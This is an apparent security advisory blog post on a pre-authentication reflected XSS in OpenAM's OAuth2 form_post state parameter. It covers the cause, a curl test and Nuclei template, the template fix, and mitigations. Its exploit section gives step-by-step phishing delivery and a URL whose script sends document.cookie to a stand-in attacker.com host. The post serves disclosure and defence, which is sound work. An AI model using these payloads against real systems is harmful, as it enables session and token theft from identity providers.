Listen to this Post
(CVE ID pending assignment; GitHub Advisory published 2026‑06‑21)
How the CVE Works
The OAuth 2.0 / OpenID Connect authorization endpoint in OpenAM implements the `form_post` response mode, which returns an HTML page that auto‑submits a form containing the authorization response parameters. The `state` parameter, which is supplied by the client in the initial authorization request, is embedded directly into this HTML response without proper contextual output encoding.
When an attacker crafts a malicious `state` value containing JavaScript payloads (e.g., "><script>alert(1)</script>), the unsanitized input is reflected in the `FormPostResponse.ftl` FreeMarker template. Because the response is served from the same origin as OpenAM, the injected script executes in the context of the victim’s browser session.
The vulnerability is triggered before authentication – simply by luring a victim to click a specially crafted OAuth2 authorization URL. No valid session or token is required, making it a pre‑authentication (pre‑auth) reflected XSS.
The root cause lies in the template’s failure to escape HTML‑special characters for the `state` parameter when building the auto‑submit form. OpenAM versions 13.0.0 through 16.1.0 are affected; the issue was fixed in 16.1.1 by applying proper output escaping (e.g., FreeMarker’s `?html` built‑in) to all user‑controlled parameters included in the `form_post` response.
An attacker can exploit this to:
- Steal session cookies (if not
HttpOnly) or OAuth tokens, - Perform actions on behalf of the victim within the OpenAM realm,
- Redirect the user to a phishing site,
- Deface the OpenAM login page,
- Bypass CSRF protections that rely on the `state` parameter.
Because the XSS is reflected and requires user interaction (clicking a link), it is often considered “critical” due to the high impact on confidentiality and integrity, especially in IAM environments where OpenAM is the central authentication hub.
DailyCVE Form
| Field | Value |
|-|-|
| Platform | OpenAM (Open Identity Platform) |
| Version | 13.0.0 – 16.1.0 |
| Vulnerability | Pre‑auth Reflected XSS |
| Severity | Critical |
| Date | 2026‑06‑21 |
| Prediction | Patch expected 2026‑06‑22 |
Analytics – What Undercode Say
“The `state` parameter is the attack vector – sanitize it everywhere.”
Bash commands to test the vulnerability (replace `$OPENAM_HOST` with your target):Craft a malicious state parameter with a simple XSS payload PAYLOAD='"><script>alert("XSS")</script>' URL="https://$OPENAM_HOST/openam/oauth2/authorize?response_type=code&client_id=test&redirect_uri=https://example.com/callback&state=$PAYLOAD&response_mode=form_post" Send the request and observe the reflected payload in the response curl -v "$URL" | grep -i "script"
Nuclei template snippet (for automated scanning):
id: CVE-2026-XXXXX-OpenAM-FormPost-XSS
info:
name: OpenAM Pre-auth Reflected XSS in form_post state
severity: critical
tags: openam,xss,oauth
requests:
- raw:
- |
GET /openam/oauth2/authorize?response_type=code&client_id=test&redirect_uri=https://example.com&state=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&response_mode=form_post HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
FreeMarker patch example (from `FormPostResponse.ftl`):
<-- Before (vulnerable) -->
<input type="hidden" name="state" value="${state}"/>
<-- After (fixed in 16.1.1) -->
<input type="hidden" name="state" value="${state?html}"/>
Exploit
- Craft the malicious URL with the XSS payload in the `state` parameter.
- Deliver the link to an authenticated or unauthenticated user (phishing email, social engineering, etc.).
- Victim clicks the link and is redirected to OpenAM’s authorization endpoint.
- OpenAM renders the `form_post` response page, which includes the unsanitized `state` value.
- The injected JavaScript executes in the victim’s browser, allowing the attacker to:
– Steal session cookies (if not HttpOnly),
– Exfiltrate OAuth2 authorization codes or tokens,
– Perform actions as the victim (e.g., change password, create new users),
– Redirect the victim to an attacker‑controlled site.
Example exploit URL:
https://openam.example.com/openam/oauth2/authorize?
response_type=code
&client_id=attacker_client
&redirect_uri=https://attacker.com/callback
&state="><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
&response_mode=form_post
Protection
- Upgrade to OpenAM 16.1.1 or later – this is the only complete fix.
- If upgrade is not immediately possible, apply the patch to `FormPostResponse.ftl` by adding `?html` to all user‑supplied parameters (see patch example above).
- Enforce a strong Content Security Policy (CSP) that disallows `unsafe-inline` for scripts – this mitigates XSS even if the vulnerability is present.
- Set `HttpOnly` and `Secure` flags on all session cookies to prevent cookie theft via JavaScript.
- Validate and sanitize the `state` parameter on the server side – reject any value containing HTML‑special characters or script patterns.
- Use a Web Application Firewall (WAF) with rules that block reflected XSS patterns in the `state` parameter.
Impact
- Confidentiality: Attacker can steal session cookies, OAuth tokens, and sensitive user data.
- Integrity: Attacker can perform arbitrary actions on behalf of the victim, including privilege escalation, user creation, and policy changes.
- Availability: Although not a direct DoS, the XSS can be used to redirect users, cause session confusion, or deface the login portal.
- Severity: Critical – because OpenAM is the central identity provider for many organisations, compromising a single user’s session can lead to a full domain takeover.
- Exploitability: Remotely exploitable over the network, low complexity, requires user interaction (clicking a link), but no authentication is needed to trigger the reflection.
CISA KEV: Not yet added, but likely to be included given the critical severity and widespread use of OpenAM in enterprise environments.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
